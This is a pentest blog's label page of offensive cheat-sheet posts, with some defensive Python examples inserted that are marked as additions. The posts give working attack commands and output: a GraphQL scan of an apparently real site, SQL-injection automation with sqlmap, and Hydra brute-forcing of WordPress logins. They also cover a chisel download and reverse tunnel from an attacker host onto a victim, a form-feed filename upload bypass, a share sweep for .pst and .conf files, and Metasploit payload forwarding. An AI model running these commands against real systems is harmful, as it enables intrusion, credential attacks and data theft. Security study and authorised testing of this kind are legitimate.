Showing posts with the label pentest. Show all posts

Friday, 11 April 2025

GraphQL Cop - Security Audit Utility for GraphQL

GraphQL Cop is a small Python utility for running common security tests against GraphQL APIs. It is well suited to CI/CD checks of GraphQL endpoints: it is lightweight and covers the security issues in GraphQL that matter in practice.


GraphQL Cop lets you reproduce its findings by printing a cURL command for every vulnerability it identifies.

Write-up on GraphQL: https://blog.koalasec.co/2500-dollars-in-bounties-hacking-graphql


https://github.com/dolevf/graphql-cop


└─# python3 graphql-cop.py -t https://sdb.ua/?q=getnciesList

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphiql)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /playground)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /console)

[HIGH] Alias Overloading - Alias Overloading with 100+ aliases is allowed (Denial of Service - /graphql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphiql)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /playground)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /console)

[HIGH] Directive Overloading - Multiple duplicated directives allowed in a query (Denial of Service - /graphql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphiql)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /playground)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /console)

[HIGH] Field Duplication - Queries are allowed with 500 of the same repeated field (Denial of Service - /graphql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphiql)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /playground)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /console)

[LOW] Field Suggestions - Field Suggestions are Enabled (Information Leakage - /graphql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphiql)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /playground)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /console)

[HIGH] Introspection - Introspection Query Enabled (Information Leakage - /graphql)
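As an added example (not part of the post and not GraphQL Cop's own code): a Python pre-validation check of the kind a defender can put in front of a GraphQL endpoint to reject the three denial-of-service patterns reported above (alias overloading, directive overloading, field duplication) before the document reaches the executor. The limits, the regex-based normalisation and the sample documents are constructed for this illustration; a real deployment would rely on its GraphQL library's schema-aware validation rules (depth and complexity limits) and would additionally turn off introspection and field suggestions in production, which this snippet does not cover.

```python
import re
from collections import Counter

# Limits are assumptions for this example; tune them to what the schema really needs.
MAX_ALIASES = 20            # total aliases allowed in one document
MAX_FIELD_REPEATS = 10      # how often the same field name may be selected
MAX_DIRECTIVE_REPEATS = 5   # how often the same directive may be applied

KEYWORDS = {"query", "mutation", "subscription", "fragment", "on",
            "true", "false", "null"}

STRING_RE = re.compile(r'"""[\s\S]*?"""|"(?:\\.|[^"\\\n])*"')
COMMENT_RE = re.compile(r'#[^\n]*')
ARGS_RE = re.compile(r'\([^()]*\)')
# One regex, four token kinds: @directive, $variable, alias:, plain identifier.
TOKEN_RE = re.compile(r'@(\w+)|\$\w+|(\w+)\s*:|(\w+)')


def normalise(query: str) -> str:
    """Blank out string literals, comments and argument lists so that
    'name: value' inside arguments is not mistaken for an alias."""
    query = STRING_RE.sub('""', query)
    query = COMMENT_RE.sub('', query)
    prev = None
    while prev != query:            # peel nested parentheses from the inside out
        prev, query = query, ARGS_RE.sub('()', query)
    return query


def analyse(query: str) -> dict:
    """Count aliases, repeated field names and repeated directives."""
    aliases = 0
    fields, directives = Counter(), Counter()
    for m in TOKEN_RE.finditer(normalise(query)):
        directive, alias, ident = m.group(1), m.group(2), m.group(3)
        if directive:
            directives[directive] += 1
        elif alias:
            aliases += 1
        elif ident and ident not in KEYWORDS:
            fields[ident] += 1
    return {
        "aliases": aliases,
        "max_field_repeat": max(fields.values(), default=0),
        "max_directive_repeat": max(directives.values(), default=0),
    }


def findings(query: str) -> list:
    """Return the list of limit violations; an empty list means the query may proceed."""
    s = analyse(query)
    out = []
    if s["aliases"] > MAX_ALIASES:
        out.append(f"alias overloading: {s['aliases']} aliases")
    if s["max_field_repeat"] > MAX_FIELD_REPEATS:
        out.append(f"field duplication: a field repeated {s['max_field_repeat']} times")
    if s["max_directive_repeat"] > MAX_DIRECTIVE_REPEATS:
        out.append(f"directive overloading: a directive repeated {s['max_directive_repeat']} times")
    return out


# Constructed sample documents (not taken from the scanned target).
BENIGN = 'query($id: ID!) { user(id: $id) { id name @include(if: true) posts { title } } }'
ALIAS_ABUSE = "{ " + " ".join(f"a{i}: user(id: 1) {{ id }}" for i in range(100)) + " }"
FIELD_ABUSE = "{ user { " + "name " * 500 + "} }"
DIRECTIVE_ABUSE = "{ user { name " + "@include(if: true) " * 20 + "} }"

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("aliases", ALIAS_ABUSE),
                       ("fields", FIELD_ABUSE), ("directives", DIRECTIVE_ABUSE)]:
        print(f"{label:10} -> {findings(doc) or 'ok'}")
```

The check deliberately works on the raw document text so it can run in a WAF-style filter before parsing; because it is not schema-aware it should be treated as a cheap first line, with the library's validation rules as the real control.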

Monday, 21 October 2024

run ffuf against all domains from a file

httpx -list mexico | xargs -I {} sh -c 'clean_url=$(echo {} | sed -e "s|https://|1|g" -e "s|http://|2|g"); ffuf -u {}/FUZZ -w raft-large-words.txt -ac -c -e .txt,.php,.bak,.rar,.sql,.zip,.php_,.old,._old,._php --recursion --recursion-depth 2 >> ffuf-mexico$clean_url'

Thursday, 3 October 2024

*.js.map files

In web applications, remember to check whether the developer forgot to remove the .js.map files.


A quick PHP script that usually does the job


<?php
/**
 * Created by PhpStorm.
 * User: edwinsturt
 * Date: 2020-06-24
 * Time: 00:45
 */

// Source map to unpack: every entry in "sources" is written out with its "sourcesContent".
$mapFile = 'main.ff0058ad.js.map';

if (file_exists($mapFile)) {
    $json = json_decode(file_get_contents($mapFile));

    $files = [];

    foreach ($json->sources as $index => $source) {
        // Recreate the original directory layout below the current directory.
        $dir = dirname($source);
        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }
        $data = explode('/', $source);
        $name = end($data);
        file_put_contents($dir . "/" . $name, $json->sourcesContent[$index]);
        $files[] = $dir . "/" . $name;
    }
    echo "<pre>All source code has been extracted from the map file ";
    print_r($files);
}
?>


php skrypt.php and welcome, env :)
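An added example, not the post's PHP script: the same extraction in Python, with the one check the PHP version lacks. The `sources` entries of a map you did not build yourself are untrusted input, so each path is resolved and anything that would land outside the output directory is refused instead of written. The sample map is constructed inline, and the handling of the `webpack:///` prefix is an assumption about how bundlers name their sources.

```python
import json
import os
import tempfile
from pathlib import Path

# Constructed sample map (not from the blog post): a normal webpack source, a
# dotfile that a bundler should never have shipped, and a path that tries to
# climb out of the output directory.
SAMPLE_MAP = json.dumps({
    "version": 3,
    "file": "main.js",
    "sources": ["webpack:///./src/App.js", "webpack:///./.env", "../../etc/cron.d/evil"],
    "sourcesContent": ["export default 1;\n", "API_KEY=constructed\n", "* * * * * root id\n"],
})


def source_to_relative_path(src: str) -> str:
    """Drop the bundler scheme (webpack:///, ...) and a leading './'."""
    rel = src.split(":///", 1)[-1]
    return rel[2:] if rel.startswith("./") else rel


def extract_sources(map_text: str, out_dir: str) -> dict:
    """Write every embedded source to out_dir, refusing any path that would
    resolve outside it. Returns the written and rejected paths."""
    smap = json.loads(map_text)
    sources = smap.get("sources", [])
    contents = smap.get("sourcesContent") or []
    root = Path(out_dir).resolve()
    written, rejected = [], []
    for src, body in zip(sources, contents):
        if body is None:                     # map references a file without content
            continue
        target = (root / source_to_relative_path(src)).resolve()
        if os.path.commonpath([str(root), str(target)]) != str(root):
            rejected.append(src)             # '../' or absolute path escaping out_dir
            continue
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
        written.append(target.relative_to(root).as_posix())
    return {"written": written, "rejected": rejected}


def demo() -> dict:
    """Run the extractor on the constructed map inside a throw-away directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return extract_sources(SAMPLE_MAP, tmp)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```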



Tuesday, 11 June 2024

SQLi oneliner automation

 subfinder -d testphp.vulnweb.com -all -silent | gau | urldedupe | gf sqli >sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sqli.txt





go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

go install github.com/lc/gau/v2/cmd/gau@latest

git clone https://github.com/ameenmaali/urldedupe.git;cd urldedupe;cmake CMakeLists.txt;make;cp urldedupe /usr/bin/

go install github.com/tomnomnom/gf@latest;cp ~/go/bin/gf /usr/bin/;mkdir ~/.gf;git clone https://github.com/Sherlock297/gf_patterns.git;cd gf_patterns/;cp *.json ~/.gf;gf -list

Thursday, 14 March 2024

Penetration testing a Flutter app


https://github.com/ptswarm/reFlutter


 ❯ pip3 install --upgrade --force-reinstall reflutter

Defaulting to user installation because normal site-packages is not writeable

Collecting reflutter

  Downloading reflutter-0.7.8-py3-none-any.whl.metadata (9.0 kB)

Downloading reflutter-0.7.8-py3-none-any.whl (24 kB)

Installing collected packages: reflutter

  Attempting uninstall: reflutter

    Found existing installation: reflutter 0.7.7

    Uninstalling reflutter-0.7.7:

      Successfully uninstalled reflutter-0.7.7

  WARNING: The script reflutter is installed in '/Users/michal/Library/Python/3.10/bin' which is not on PATH.

  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.

Successfully installed reflutter-0.7.8

USAGE:

reflutter your.(apk)|(ipa)

/Users/michal/Library/Python/3.10/bin/reflutter 49406.apk


 Choose an option: 


 1. Traffic monitoring and interception 

 2. Display absolute code offset for functions


 [1/2]? 1


Example: (192.168.1.154) etc.

Please enter your BurpSuite IP: 192.168.51.129


 Wait...



SnapshotHash: ee1eb666c76a5cb7746faf39d0b97547

The resulting apk file: ./release.RE.apk

Please sign,align the apk file


Configure Burp Suite proxy server to listen on *:8083

Proxy Tab -> Options -> Proxy Listeners -> Edit -> Binding Tab


Then enable invisible proxying in Request Handling Tab

Support Invisible Proxying -> true


DOWNLOAD:

https://github.com/patrickfav/uber-apk-signer

java -jar uber-apk-signer-1.3.0.jar --apks release.RE.apk

source:

/Users/michal/Downloads

zipalign location: BUILT_IN 

/var/folders/gs/n5db96m941gb7b4ly4r1dw100000gn/T/uapksigner-2589864279722257602/mac-zipalign-33_0_216157554363753981716.tmp

keystore:

[0] 161a0018 /private/var/folders/gs/n5db96m941gb7b4ly4r1dw100000gn/T/temp_3968706172894682738_debug.keystore (DEBUG_EMBEDDED)


01. release.RE.apk


SIGN

file: /Users/michal/Downloads/release.RE.apk (221.2 MiB)

checksum: e28f1257d549f0cb5cfe774a4ad6ffa379be58f91c74aa6630ad720fcafb253a (sha256)

- zipalign success

- sign success


VERIFY

file: /Users/michal/Downloads/release.RE-aligned-debugSigned.apk (221.34 MiB)

checksum: 6504671cfc17578de09c94f90fdd79cf9fd838de633f3b25c25ba865f5dab1d2 (sha256)

- zipalign verified

- signature verified [v3]

Subject: CN=Android Debug, OU=Android, O=US, L=US, ST=US, C=US

SHA256: 1e08a903aef9c3a721510b64ec764d01d3d094eb954161b62544ea8f187b5953 / SHA256withRSA

Expires: Thu Mar 10 21:10:05 CET 2044


[Thu Mar 14 20:07:37 CET 2024][v1.3.0]

Successfully processed 1 APKs and 0 errors in 5.43 seconds.


adb install release.RE-aligned-debugSigned.apk

Performing Incremental Install

Serving...

Success

Install command complete in 527 ms

~/Downloads ❯ All files should be loaded. Notifying the device.    

Wednesday, 1 February 2023

APT attack campaign by a Chinese hacker group


AhnLab

Posted by kingkimgim, 31 January 2023

Dalbit (m00nlight): APT attack campaign by a Chinese hacker group

0. Overview

The content is an extension of the blog post “Attack Group using FRP (Fast Reverse Proxy) Targeting Domestic Companies”, published on 16 August 2022, and follows the group's subsequent activity.


source: https://asec.ahnlab.com/ko/46431/

Wednesday, 18 January 2023

Wednesday, 14 December 2022

apk.sh - makes reverse engineering Android apps easier

apk.sh is a Bash script that makes reverse engineering Android apps easier by automating some repetitive tasks such as pulling, decoding, rebuilding and patching an APK.


Features

apk.sh essentially uses apktool to disassemble, decode and rebuild resources, plus some bash to automate the frida gadget injection process. It also supports app bundles/split APKs.


🍄 Patching APKs to load frida-gadget.so on start.

🆕 Support for app bundles/split APKs.

🔩 Rebuilding decoded resources back into a binary APK/JAR with apktool.

🗝️ Code-signing the APK with apksigner.

https://github.com/ax/apk.sh

Monday, 25 January 2021

TCP/UDP reverse tunnel, transported over HTTP, secured via SSH - chisel

#### CHISEL INSTALL

curl https://i.jpillora.com/chisel! | bash

## copy to victim server: 
www-data@passage:/tmp$ wget http://10.10.14.143/chisel
wget http://10.10.14.143/chisel
--2021-01-25 08:55:34--  http://10.10.14.143/chisel
Connecting to 10.10.14.143:80... failed: Connection refused.
www-data@passage:/tmp$ wget http://10.10.14.143:8000/chisel
wget http://10.10.14.143:8000/chisel
--2021-01-25 08:55:47--  http://10.10.14.143:8000/chisel
Connecting to 10.10.14.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8704000 (8.3M) [application/octet-stream]
Saving to: 'chisel'

chisel              100%[===================>]   8.30M  5.33MB/s    in 1.6s    

2021-01-25 08:55:49 (5.33 MB/s) - 'chisel' saved [8704000/8704000]

www-data@passage:/tmp$ 


##  my computer:
chisel server -p 9999 --reverse

## victim computer 
./chisel client 10.10.14.143:9999 R:631:localhost:631

##############



hydra -l paul -P /usr/share/wordlists/rockyou.txt -s 631 -f 127.0.0.1 http-get /admin/log/error_log

Friday, 18 December 2020

intercept http2 (grpc) in BURP SUITE PROXY

 as root:

iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner mitmproxyuser -d 18.159.107.117 -j REDIRECT --to-port 8080          

adduser mitmproxyuser


cat /etc/nghttpx/nghttpx.conf   (downstream config)


frontend=0.0.0.0,8080;no-tls

backend=127.0.0.1,8081;;proto=http/1.1

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

backend-http2-window-size=134217720

backend-http2-connection-window-size=1073741760

frontend-http2-window-size=134217720

frontend-http2-connection-window-size=1073741760

http2-proxy=no

private-key-file=/etc/nghttpx/server.key

certificate-file=/etc/nghttpx/server.crt

cacert=/etc/nghttpx/ca.crt

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


cat /etc/nghttpx/upstream.conf   (upstream config)

frontend=127.0.0.1,8082;no-tls

backend=vendor-IP,28900;;no-tls;proto=h2

backend-keep-alive-timeout=5m

frontend-http2-read-timeout=5m

frontend-read-timeout=5m

frontend-write-timeout=5m

stream-read-timeout=5m

stream-write-timeout=5m

backend-read-timeout=5m

backend-write-timeout=5m

backend-connect-timeout=5m

listener-disable-timeout=5m

http2-proxy=no

accesslog-syslog=yes

errorlog-syslog=yes

workers=5


run nghttpx as root:


┌──(root💀kali)-[/etc/nghttpx]

└─# nghttpx

2020-12-18T14:38:21.383+01:00 8777 8777 99aaafb4 NOTICE (shrpx.cc:2882) Loading configuration from /etc/nghttpx/nghttpx.conf


run burp suite proxy 127.0.0.1:8081 (invisible proxy)

USER OPTIONS -> Upstream proxy add 127.0.0.1:8082


as mitmproxyuser:

┌──(mitmproxyuser㉿kali)-[/etc/nghttpx]

└─$ nghttpx --conf upstream.conf

2020-12-18T14:42:00.364+01:00 9293 9293 59e630c7 NOTICE (shrpx.cc:2882) Loading configuration from upstream.conf



as root:

run python code (client http2)











Wednesday, 16 September 2020

How to parse ffuf output file

ffuf -o output_file    # run ffuf with -o to save the results as JSON
cat output_file | jq -c '.results[] | {url: .url, status: .status}'
for file in dirb/*; do cat "$file" | jq -c '.results[] | {url: .url, status: .status}'; done
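As an added example, not part of the post: a Python reader for the same ffuf JSON output (a `results` array whose entries carry `url`, `status`, `length`, `words`, `lines` and `input`), going one step beyond the jq one-liner by collapsing catch-all responses: hits whose (status, length, words, lines) signature repeats many times are almost always the same soft-404 page. The sample output and the threshold are constructed for the example.

```python
import json
from collections import Counter

# Constructed sample of ffuf's JSON output (only the fields used here).
SAMPLE_FFUF_JSON = json.dumps({
    "commandline": "ffuf -u http://example.test/FUZZ -w words.txt -o out.json",
    "results": [
        {"input": {"FUZZ": "admin"},          "status": 301, "length": 0,    "words": 1,   "lines": 1,  "url": "http://example.test/admin"},
        {"input": {"FUZZ": "backup"},         "status": 200, "length": 512,  "words": 40,  "lines": 12, "url": "http://example.test/backup"},
        {"input": {"FUZZ": "foo"},            "status": 200, "length": 512,  "words": 40,  "lines": 12, "url": "http://example.test/foo"},
        {"input": {"FUZZ": "bar"},            "status": 200, "length": 512,  "words": 40,  "lines": 12, "url": "http://example.test/bar"},
        {"input": {"FUZZ": ".git"},           "status": 403, "length": 199,  "words": 20,  "lines": 5,  "url": "http://example.test/.git"},
        {"input": {"FUZZ": "config.php.bak"}, "status": 200, "length": 2048, "words": 300, "lines": 60, "url": "http://example.test/config.php.bak"},
    ],
})


def load_results(text: str) -> list:
    """Equivalent of  jq '.results[]'  on one ffuf output file."""
    return json.loads(text).get("results", [])


def signature(result: dict) -> tuple:
    """Response shape used to recognise a catch-all page."""
    return (result["status"], result["length"], result["words"], result["lines"])


def interesting(results: list, noise_threshold: int = 3) -> list:
    """Keep url/status pairs, dropping results whose response shape repeats
    noise_threshold times or more (ffuf's -ac does something similar at scan time)."""
    counts = Counter(signature(r) for r in results)
    return [{"url": r["url"], "status": r["status"]}
            for r in results if counts[signature(r)] < noise_threshold]


def status_histogram(results: list) -> dict:
    """Quick overview: how many hits per status code."""
    return dict(Counter(r["status"] for r in results))


if __name__ == "__main__":
    hits = load_results(SAMPLE_FFUF_JSON)
    print(status_histogram(hits))
    for h in interesting(hits):
        print(h["status"], h["url"])
```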

Wednesday, 26 August 2020

find .git repo!

curl -s "https://crt.sh/?q=%25.domain.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew

Friday, 3 July 2020

Form Feed U+000C

A character that sometimes lets you get past the file-extension check in web apps - • (U+000C, shown here as •)
// http://www.fileformat.info/info/unicode/char/000C/index.htm

POST /api/image_upload HTTP/1.1
Host: X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91652467232091688581205088441
Content-Length: 631
Connection: close


-----------------------------91652467232091688581205088441
Content-Disposition: form-data; name="file"; filename=".svg•.pdf"
Content-Type: application/pdf

xxx
-----------------------------91652467232091688581205088441--


HTTP/1.1 200 OK
Date: Fri, 03 Jul 2020 08:09:26 GMT
Server: Apache/2
Upgrade: h2,h2c
Connection: Upgrade, close
Vary: Accept-Encoding,User-Agent
Content-Length: 21
Content-Type: text/html

1593763766-94292_.svg
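An added example, not from the post: a Python filename check of the kind the upload handler above should have had. The naive check accepts `.svg\x0c.pdf` because it only inspects the final extension, while the storage layer may later cut the name at the control character (the response above shows the file ending up as `.svg`). The hardened version refuses control and format characters outright, drops directory components, and rewrites the stem so that a double extension cannot survive. The extension allow-list is an assumption for the example.

```python
import re
import unicodedata
from pathlib import PurePosixPath

ALLOWED_EXTENSIONS = {"pdf", "png", "jpg"}   # assumed allow-list for this example


def naive_is_allowed(filename: str) -> bool:
    """The kind of check that lets '.svg\\x0c.pdf' through: it only looks at the
    last extension and never asks what the storage layer will do with the rest."""
    return filename.lower().rsplit(".", 1)[-1] in ALLOWED_EXTENSIONS


def hardened_filename(filename: str) -> str:
    """Return the name the file will be stored under, or raise ValueError.

    1. Reject control and format characters (form feed U+000C, NUL, zero-width
       characters, ...) outright instead of trying to strip them.
    2. Drop directory components, both '/' and '\\' separated.
    3. Require an allow-listed final extension and neutralise everything before
       it, so 'x.svg.pdf' becomes 'x_svg.pdf' and can never be served as SVG.
    """
    if any(unicodedata.category(ch) in ("Cc", "Cf") for ch in filename):
        raise ValueError("control or format character in filename")
    name = PurePosixPath(filename.replace("\\", "/")).name
    if not name or name.startswith("."):
        raise ValueError("empty or dot-prefixed filename")
    stem, dot, ext = name.rpartition(".")
    if not dot or ext.lower() not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext!r}")
    safe_stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem)[:64] or "upload"
    return f"{safe_stem}.{ext.lower()}"


def is_accepted(filename: str) -> bool:
    """Convenience wrapper: True when the hardened check accepts the name."""
    try:
        hardened_filename(filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    probe = ".svg\x0c.pdf"           # the filename from the request above
    print(naive_is_allowed(probe), is_accepted(probe))   # True False
```

Rejecting rather than stripping is the point: once a control character is removed the remaining name is reinterpreted, and the stored name may no longer be the one that passed validation.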

Tuesday, 21 January 2020

Searching network shares for files you can read - PowerShell

$REMOTE_HOST = "172.21.56.235"

# -Include expects an array of patterns, not a single comma-separated string
$FILE_TYPES = "*.pst", "*.conf"

net view \\$REMOTE_HOST\ |
ForEach-Object {
    # share names are followed by the localized type column ("Dysk" = "Disk" on a Polish system)
    $path = [regex]::match($_, '(.*)       Dysk').Groups[1].Value.Trim()

    if ($path -ne "") {
        Write-Host ("### PATH: " + $path)
        Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
        ForEach-Object {
            Try {
                # opening the file for reading proves we really have read access
                [System.IO.File]::OpenRead($_.FullName).Close()
                Write-Host $_.FullName
            }
            Catch {
                #Write-Host ("No: " + $_.FullName)
            }
        }
    }
}



// Author: hagier

Wednesday, 16 October 2019

Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)


One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I spent some time on this because I didn't issue the LIST command. See how it is done correctly :)


Thursday, 5 September 2019

OSINT links

https://github.com/jivoi/awesome-osint
https://start.me/p/rxRbpo/ti
https://www.osintdfir.com
https://www.faxvin.com/license-plate-lookup
https://knowem.com/
https://checkusernames.com/
https://stalkscan.com/
https://tineye.com/
https://www.genymotion.com/
Instagram search tool .. https://web.stagram.com/
http://onstrat.com/osint/
https://code.google.com/archive/p/theharvester/
https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit#heading=h.kmtmtyoi48ch
https://github.com/Ph055a/awesome_osint
https://osintframework.com/

Wednesday, 30 January 2019

Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

If you want to use your own certificate with Metasploit, for example for windows/meterpreter/reverse_https, use auxiliary/gather/impersonate_ssl, but first change the OpenSSL setting in your OS.

in /etc/ssl/openssl.cnf

from

CipherString=DEFAULT@SECLEVEL=2
to 
CipherString=DEFAULT 


Tuesday, 29 January 2019

Port forwarding on Linux, e.g. for Metasploit

When attacking an external target you will often meet the following infrastructure:
- Computer A - victim
- Computer B - intermediate server
- Computer C - attacker

To forward the connection from A to C, use SSH port forwarding.

To do this, on computer B:

add GatewayPorts yes to /etc/ssh/sshd_config
and restart sshd

On computer A run:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

On computer C start e.g. multi/handler with
LHOST -> IP of computer C
LPORT -> 4444


On computer B run the payload with the options:
LHOST -> IP of computer B
LPORT -> 8888

Thursday, 10 January 2019

Hydra cheat sheet

WordPress:

hydra -f -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'

Saturday, 16 September 2017

SSH tunnel between one machine and several networks


https://github.com/apenwarr/sshuttle

sshuttle -e "ssh -i file.key" -r w4cky@172.16.0.252 192.168.10.0/24 192.168.11.0/24

does not require root :)